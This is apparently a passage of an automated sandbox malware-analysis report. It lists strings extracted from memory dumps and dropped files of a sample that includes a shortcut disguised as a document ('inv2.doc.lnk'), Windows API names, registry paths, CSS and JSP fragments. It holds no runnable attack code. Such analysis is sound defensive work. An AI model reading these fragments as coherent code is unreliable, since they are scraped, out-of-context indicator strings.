Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SetDlgItemTextW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SetEndOfFile

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetEnvironmentStringsW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetEnvironmentVariableW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetErrorMode

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetFileAttributesW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetFilePointer

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetFilePointerEx

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetFileTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetForegroundWindow

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SetLastError

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

setlocale

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetLocalTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetProcessAffinityMask

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetTextColor

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SetThreadLocale

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetThreadUILanguage

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetTimer

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

settings_tolerance=2000,

Ansi based on Dropped File (unternehmen.jsp)

SEtU_lTY_

Ansi based on Image Processing (screen_0.png)

SetUnhandledExceptionFilter

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetWindowLongW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SetWindowPos

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SetWindowTextW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SHARED

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

SHAutoComplete

Ansi based on Dropped File (Roaming.exE.1622950302)

SHBrowseForFolderW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SHELL32.dll

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ShellExecuteW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

ShellState

Unicode based on Runtime Data (exE )

SHFileOperationW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SHFOLDER

Ansi based on Dropped File (Roaming.exE.1622950302)

SHGetFileInfoW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SHGetFolderPathW

Ansi based on Dropped File (Roaming.exE.1622950302)

SHGetPathFromIDListW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SHGetSpecialFolderLocation

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SHLWAPI

Ansi based on Dropped File (Roaming.exE.1622950302)

ShowCompColor

Unicode based on Runtime Data (exE )

ShowInfoTip

Unicode based on Runtime Data (exE )

ShowSuperHidden

Unicode based on Runtime Data (exE )

ShowTypeOverlay

Unicode based on Runtime Data (exE )

ShowWindow

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

skip=

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Sleep

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Software\Classes

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

Software\Microsoft\Command Processor

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Software\Microsoft\Windows\CurrentVersion

Unicode based on Hybrid Analysis (exE , 00022258-00003592.00000000.22762.00401000.00000020.mdmp)

Software\Policies\Microsoft\Windows\System

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SourcePath

Unicode based on Runtime Data (exE )

srand

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

START

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

Store

Ansi based on Dropped File (System.dll.469766707)

StrAlloc

Ansi based on Dropped File (System.dll.469766707)

strcpynW

Ansi based on Dropped File (Roaming.exE.1622950302)

Stream

Unicode based on Runtime Data (exE )

StreamResource

Unicode based on Runtime Data (exE )

StreamResourceType

Unicode based on Runtime Data (exE )

sTreeView32

Unicode based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

StringFileInfo

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

StringFromGUID2

Ansi based on Dropped File (System.dll.469766707)

Styles for older IE versions (previous to IE9).

Ansi based on Dropped File (ie179663103.css)

swscanf

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SysListView32

Unicode based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

System

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

System.dll

Ansi based on Dropped File (System.dll.469766707)

System32 (%WINDIR%\

Unicode based on Memory/File Scan (inv2.doc.lnk.bin)

SystemParametersInfoW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SystemSetupInProgress

Unicode based on Runtime Data (exE )

SystemTimeToFileTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

tCodeAscii

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

teProcessW

Ansi based on Dropped File (Roaming.exE.1622950302)

TerminateProcess

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

text-align: center;

Ansi based on Dropped File (ext.default.css)

text-decoration: none;

Ansi based on Dropped File (ext.default.css)

text-transform: uppercase;

Ansi based on Dropped File (ext.default.css)

ThemeApiConnectionRequest

Unicode based on Runtime Data (exE )

ThreadingModel

Unicode based on Runtime Data (exE )

TLOCAL

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

tokens=

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

top: -1em;

Ansi based on Dropped File (ext.default.css)

top: -2px;

Ansi based on Dropped File (ext.default.css)

top: -4px;

Ansi based on Dropped File (ext.default.css)

top: -999em;

Ansi based on Dropped File (ext.default.css)

top: 0;

Ansi based on Dropped File (ext.default.css)

top: 40px;

Ansi based on Dropped File (ie179663103.css)

top: 5px !important;

Ansi based on Dropped File (ext.default.css)

top: 75px;

Ansi based on Dropped File (ext.default.css)

towlower

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

towupper

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

TrackPopupMenu

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

Translation

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

TransparentEnabled

Unicode based on Runtime Data (cmd.exe )

Type: %x

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Ungetting: '%s'

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

UnhandledExceptionFilter

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Unknown

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

UpdateProcThreadAttribute

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

use_existing_jquery=false,

Ansi based on Dropped File (unternehmen.jsp)

useback

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

usebackq

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

UseDropHandler

Unicode based on Runtime Data (exE )

UseHostnameAsAlias

Unicode based on Runtime Data (exE )

UseOldHostResolutionOrder

Unicode based on Runtime Data (exE )

USER32.dll

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Users

Unicode based on Runtime Data (cmd.exe )

var _vwo_code=(function(){

Ansi based on Dropped File (unternehmen.jsp)

var account_id=7054,

Ansi based on Dropped File (unternehmen.jsp)

var et_easy = 1;

Ansi based on Dropped File (unternehmen.jsp)

var et_pagename = 'index.jsp';

Ansi based on Dropped File (unternehmen.jsp)

verifying installer: %d%%

Unicode based on Dropped File (Roaming.exE.1622950302)

VerQueryValueW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

VERSION.dll

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

vertical-align: middle;

Ansi based on Dropped File (ie179663103.css)

Videos

Unicode based on Runtime Data (exE )

VirtualAlloc

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

VirtualFree

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

VirtualProtect

Ansi based on Dropped File (System.dll.469766707)

VirtualQuery

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

visibility: inherit;

Ansi based on Dropped File (ext.default.css)

VS_VERSION_INFO

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

WaitForSingleObject

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

WantsAliasedNotifications

Unicode based on Runtime Data (exE )

WantsFORDISPLAY

Unicode based on Runtime Data (exE )

WantsFORPARSING

Unicode based on Runtime Data (exE )

WantsParseDisplayName

Unicode based on Runtime Data (exE )

WantsUniversalDelegate

Unicode based on Runtime Data (exE )

ware\Microsoft\Command Processor

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

wcschr

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

wcsncmp

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

wcsrchr

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

wcsspn

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

wcsstr

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

wcstol

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

wcstoul

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

WebView

Unicode based on Runtime Data (exE )

WideCharToMultiByte

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

width: 100%;

Ansi based on Dropped File (ext.default.css)

width: 1040px;

Ansi based on Dropped File (ie179663103.css)

width: 13px;

Ansi based on Dropped File (ie179663103.css)

width: 150px;

Ansi based on Dropped File (ie179663103.css)

width: 16.66%;

Ansi based on Dropped File (ext.default.css)

width: 191px;

Ansi based on Dropped File (ext.default.css)

width: 400px;

Ansi based on Dropped File (ie179663103.css)

width: 40px;

Ansi based on Dropped File (ie179663103.css)

width: 420px;

Ansi based on Dropped File (ie179663103.css)

width: 440px;

Ansi based on Dropped File (ie179663103.css)

width: 460px;

Ansi based on Dropped File (ie179663103.css)

width: 480px;

Ansi based on Dropped File (ie179663103.css)

width: 5px;

Ansi based on Dropped File (ext.default.css)

width: 604px;

Ansi based on Dropped File (ie179663103.css)

width: 7px;

Ansi based on Dropped File (ext.default.css)

width: auto;

Ansi based on Dropped File (ie179663103.css)

WINBRAND.dll

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

WriteConsoleW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

WriteFile

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

WritePrivateProfileStringW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

ws Command Processor

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

wsprintfA

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

wsprintfW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

wwwwp

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

wwwwww

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

wwwwwwp

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

wwwwwwww

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

wwwwwwwwp

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

wwwwwwwwwwwwwww

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

wwwwwwwwwwwwwwwwwwwww

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

wwwwwwwx

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

wwwwwx

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

xitCode

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

xpansion

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

xsatz

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

XTVERSION

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

yy/MM/dd

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

z-index: 100;

Ansi based on Dropped File (ext.default.css)

z-index: 150;

Ansi based on Dropped File (ext.default.css)

z-index: 1;

Ansi based on Dropped File (ie179663103.css)

z-index: 50 !important;

Ansi based on Dropped File (ext.default.css)

zoom: 1;

Ansi based on Dropped File (ie179663103.css)

{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}

Unicode based on Runtime Data (exE )

{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Unicode based on Runtime Data (exE )

{56784854-C6CB-462B-8169-88E350ACB882}

Unicode based on Runtime Data (exE )

{59031A47-3F72-44A7-89C5-5595FE6B30EE}

Unicode based on Runtime Data (exE )

{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}

Unicode based on Runtime Data (exE )

{s<.8

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

|<>/":

Unicode based on Dropped File (Roaming.exE.1622950302)

~nsu.tmp

Unicode based on Dropped File (Roaming.exE.1622950302)

!This program cannot be run in DOS mode.$

Ansi based on Dropped File (Roaming.exE.1622950302)

"http://www.w3.org/TR/html4/loose.dtd">

Ansi based on Dropped File (unternehmen.jsp)

#as-menu ul.as-menu > li > a:hover > span,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li > a:hover,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li > span:hover

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li > span:hover > span

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.active > a,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.active > span,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.asHover > a,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.asHover > span,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.current > a,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.current > span

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.deeper > a

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.deeper > a:after

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.firstItem,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li:first-child

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li:hover

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li li li.asHover ul

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li li li:hover ul,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li li.asHover li ul

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li li.asHover ul

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li li:hover li ul,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li li:hover ul,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li.asHover > ul

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li.asHover li ul

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li.asHover ul

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li:hover

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li:hover > ul,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li:hover li ul,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li:hover ul,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul > li.deeper > a:after

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li a:hover,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li span:hover,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li.active > a,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li.active > span,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li.asHover > a,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li.asHover > span

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu ul li.firstItem

Ansi based on Dropped File (ext.default.css)

$('.adminButtonTop').hide();

Ansi based on Dropped File (unternehmen.jsp)

$('.content_inner').mouseenter(function () {

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheader ul li').mouseenter(function () {

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderdown img').replaceWith('<img src="images/button-right.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderdown').wrap('<div class="adminButtonTop">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderdownalone img').replaceWith('<img src="images/button-right.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderdownalone').wrap('<div class="adminButtonTop">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderedit img').replaceWith('<img src="images/button-edit.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderedit').wrap('<div class="adminButtonTop">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderup img').replaceWith('<img src="images/button-left.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderup').wrap('<div class="adminButtonTop">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderupalone img').replaceWith('<img src="images/button-left.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.eloheaderupalone').wrap('<div class="adminButtonTop">');

Ansi based on Dropped File (unternehmen.jsp)

$('.elomenudown img').replaceWith('<img src="images/button-down.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.elomenudownalone img').replaceWith('<img src="images/button-down.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.elomenuedit img').replaceWith('<img src="images/button-edit.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.elomenuup img').replaceWith('<img src="images/button-up.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.elomenuupalone img').replaceWith('<img src="images/button-up.png" alt="up" border="0">');

Ansi based on Dropped File (unternehmen.jsp)

$('.menuSelB2nd').append('<div class="menuSelB1st">');

Ansi based on Dropped File (unternehmen.jsp)

$('.secondary .elomenu ul li').mouseenter(function () {

Ansi based on Dropped File (unternehmen.jsp)

$('.secondary ul li a.elomenusel').append('<div class="menuSelB2nd">');

Ansi based on Dropped File (unternehmen.jsp)

$('.secondary ul li a.elomenusel').wrapInner('<div class="menuSelContent">').wrapInner('<div class="menuSel2nd">').wrapInner('<div class="menuSel1st">');

Ansi based on Dropped File (unternehmen.jsp)

$(document).ready(function () {

Ansi based on Dropped File (unternehmen.jsp)

$(this).find(' > a').show();

Ansi based on Dropped File (unternehmen.jsp)

$(this).find('.adminButtonTop').show();

Ansi based on Dropped File (unternehmen.jsp)

$(this).find('.elomenudown').hide();

Ansi based on Dropped File (unternehmen.jsp)

$(this).find('.elomenudownalone').hide();

Ansi based on Dropped File (unternehmen.jsp)

$(this).find('.elomenuedit').hide();

Ansi based on Dropped File (unternehmen.jsp)

$(this).find('.elomenuup').hide();

Ansi based on Dropped File (unternehmen.jsp)

$(this).find('.elomenuupalone').hide();

Ansi based on Dropped File (unternehmen.jsp)

$(this).mouseleave(function () {

Ansi based on Dropped File (unternehmen.jsp)

%d.%d.%04d

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%s (%s) %s

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%SystemRoot%\System32\shell32.dll

Ansi based on Memory/File Scan (inv2.doc.lnk.bin)

&()[]{}^=;!%'+,`~

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

(%s) %s

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

()|&=,;"

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Ansi based on Dropped File (jquery.cycle2.tile.min.js)

*?|<>/":

Unicode based on Dropped File (Roaming.exE.1622950302)

Ansi based on Dropped File (lang-en.js)

... %d%%

Unicode based on Dropped File (Roaming.exE.1622950302)

... breadcrumb was here -->

Ansi based on Dropped File (unternehmen.jsp)

... End Visual Website Optimizer Asynchronous Code -->

Ansi based on Dropped File (unternehmen.jsp)

... etracker tracklet 4.0 -->

Ansi based on Dropped File (unternehmen.jsp)

... Start Visual Website Optimizer Asynchronous Code -->

Ansi based on Dropped File (unternehmen.jsp)

... This material may not be reproduced, displayed, modified or distributed -->

Ansi based on Dropped File (unternehmen.jsp)

... without the express prior written permission of the copyright holder. -->

Ansi based on Dropped File (unternehmen.jsp)

...- Do not copy to public page! -->

Ansi based on Dropped File (unternehmen.jsp)

...[if IE]><style type="text/css">@import url(css/design-ie.css);</style><![endif]-->

Ansi based on Dropped File (unternehmen.jsp)

...[if lt IE 7]><script type="text/javascript" src="unitpngfix.js"></script><![endif]-->

Ansi based on Dropped File (unternehmen.jsp)

...[if lt IE 7]><style type="text/css">@import url(styles/content_ie6.css);</style><![endif]-->

Ansi based on Dropped File (unternehmen.jsp)

...[if lt IE 8]><style type="text/css">@import url(styles/content_ie7.css);</style><![endif]-->

Ansi based on Dropped File (unternehmen.jsp)

.7601.17514 (win7sp1_rtm.101119-1850)

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

.attachment-meta a:before:hover,

Ansi based on Dropped File (ie179663103.css)

.attachment-meta:before:hover,

Ansi based on Dropped File (ie179663103.css)

.bypostauthor > .comment-body .fn:before:hover {

Ansi based on Dropped File (ie179663103.css)

.categories-links a:first-child:before:hover,

Ansi based on Dropped File (ie179663103.css)

.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

.comment {

Ansi based on Dropped File (ie179663103.css)

.comment-awaiting-moderation:before:hover,

Ansi based on Dropped File (ie179663103.css)

.comment-content,

Ansi based on Dropped File (ie179663103.css)

.comment-list .depth-2 .reply {

Ansi based on Dropped File (ie179663103.css)

.comment-list .depth-3 .reply {

Ansi based on Dropped File (ie179663103.css)

.comment-list .depth-4 .reply {

Ansi based on Dropped File (ie179663103.css)

.comment-list .depth-5 .reply {

Ansi based on Dropped File (ie179663103.css)

.comment-list .reply {

Ansi based on Dropped File (ie179663103.css)

.comment-meta {

Ansi based on Dropped File (ie179663103.css)

.comment-meta,

Ansi based on Dropped File (ie179663103.css)

.comment-reply-link:before:hover,

Ansi based on Dropped File (ie179663103.css)

.comment-reply-title small a:before:hover,

Ansi based on Dropped File (ie179663103.css)

.comments-link a:before:hover,

Ansi based on Dropped File (ie179663103.css)

.date a:before:hover,

Ansi based on Dropped File (ie179663103.css)

.DEFAULT\Control Panel\International

Unicode based on Hybrid Analysis (exE , 00022258-00003592.00000000.22762.00401000.00000020.mdmp)

.depth-2 .comment-content,

Ansi based on Dropped File (ie179663103.css)

.depth-2 .comment-meta,

Ansi based on Dropped File (ie179663103.css)

.depth-3 .comment-content,

Ansi based on Dropped File (ie179663103.css)

.depth-3 .comment-meta,

Ansi based on Dropped File (ie179663103.css)

.depth-4 .comment-content,

Ansi based on Dropped File (ie179663103.css)

.depth-4 .comment-meta,

Ansi based on Dropped File (ie179663103.css)

.depth-5 .comment-content,

Ansi based on Dropped File (ie179663103.css)

.depth-5 .comment-meta,

Ansi based on Dropped File (ie179663103.css)

.edit-link > a:before:hover,

Ansi based on Dropped File (ie179663103.css)

.entry-meta .author a:before:hover,

Ansi based on Dropped File (ie179663103.css)

.format-audio .entry-content:before:hover,

Ansi based on Dropped File (ie179663103.css)

.format-image .entry-content .size-full {

Ansi based on Dropped File (ie179663103.css)

.gallery img {

Ansi based on Dropped File (ie179663103.css)

.gallery-caption {

Ansi based on Dropped File (ie179663103.css)

.gallery-columns-1 .gallery-item,

Ansi based on Dropped File (ie179663103.css)

.gallery-columns-2 .gallery-item,

Ansi based on Dropped File (ie179663103.css)

.gallery-columns-3 .gallery-item {

Ansi based on Dropped File (ie179663103.css)

.gallery-item:hover .gallery-caption {

Ansi based on Dropped File (ie179663103.css)

.genericon:before:hover,

Ansi based on Dropped File (ie179663103.css)

.ie7 .comment-list,

Ansi based on Dropped File (ie179663103.css)

.ie7 .comment-reply-title,

Ansi based on Dropped File (ie179663103.css)

.ie7 .comment-respond .comment-form {

Ansi based on Dropped File (ie179663103.css)

.ie7 .comments-title,

Ansi based on Dropped File (ie179663103.css)

.ie7 .entry-content,

Ansi based on Dropped File (ie179663103.css)

.ie7 .entry-header,

Ansi based on Dropped File (ie179663103.css)

.ie7 .entry-meta {

Ansi based on Dropped File (ie179663103.css)

.ie7 .entry-summary,

Ansi based on Dropped File (ie179663103.css)

.ie7 .format-status .entry-content,

Ansi based on Dropped File (ie179663103.css)

.ie7 .format-status .entry-meta {

Ansi based on Dropped File (ie179663103.css)

.ie7 .main-navigation {

Ansi based on Dropped File (ie179663103.css)

.ie7 .nav-menu .children {

Ansi based on Dropped File (ie179663103.css)

